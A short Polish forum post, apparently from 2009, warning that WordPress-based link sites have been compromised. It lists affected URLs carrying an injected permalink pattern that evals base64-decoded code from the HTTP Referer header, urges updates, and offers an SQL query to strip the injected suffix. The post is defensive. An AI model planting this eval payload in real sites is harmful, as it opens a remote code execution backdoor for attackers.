Precle eval w linkach ?

[sorrow]

Dziś przeglądałem sobie bazę dodanych wpisów do precli i zauważyłem coś dziwnego po zalogowaniu się przez automat i pobraniu linków do projektów pojawią się następujące wpisy.

%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

lub

/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

w preclach

media.link7.pl

pewniaki.honest.info.pl

news.kochamtaniec.pl

tematyczne.szepty.net

www.press.fallentarnow.pl

media.link7.pl/

pewniaki.honest.info.pl

www.odoidis.pl

www.odoidis.pl

www.gadajtanio.pl

news.kochamtaniec.pl

linukspl.eu

www.odoidis.pl/

pewniaki.honest.info.pl/

pewniaki.honest.info.pl/

www.animacje.cal.pl/

www.fantastyczne.buty-emu.info/2009/09/04/********/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

pewniaki.honest.info.pl/2009/09/05/*****/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

www.fantastyczne.buty-emu.info/2009/09/04/***/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

www.animacje.cal.pl/2009/09/01/***/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

www.portal.oscgold.eu/2009/09/04/*****/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

www.portal.oscgold.eu/2009/09/04/******/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

twoje.honest.info.pl/2009/09/03/****/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

news.kochamtaniec.pl/2009/09/04/***/%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

news.kochamtaniec.pl/2009/09/04/****/%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

www.press.fallentarnow.pl/2009/09/04/******/%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

www.gadajtanio.pl/2009/09/04/****/%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

oklamac-zone.waw.pl/2009/09/04/*****/%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

media.link7.pl/2009/09/04/****/%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

katalog.ivti.org/2009/09/04/****/%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

www.portal.oscgold.eu/2009/09/04/***/%&evalbase64_decode_SERVERHTTP_REFERER.+&%/

Więc proszę aktualizujcie swoje wordpressy

https://www.google.pl/search?q=eval%28base6...-8&oe=utf-8

Jak ktos ma uwalona baze po aktualizacji to przygotowałem małe zapytanie

UPDATE [ NAZWA TABELI ] SET [POLE DO UCIECIA] = substr(wynik,1,LOCATE('/%',[POLE DO UCIECIA])) WHERE [POLE DO UCIECIA] like '%eval%';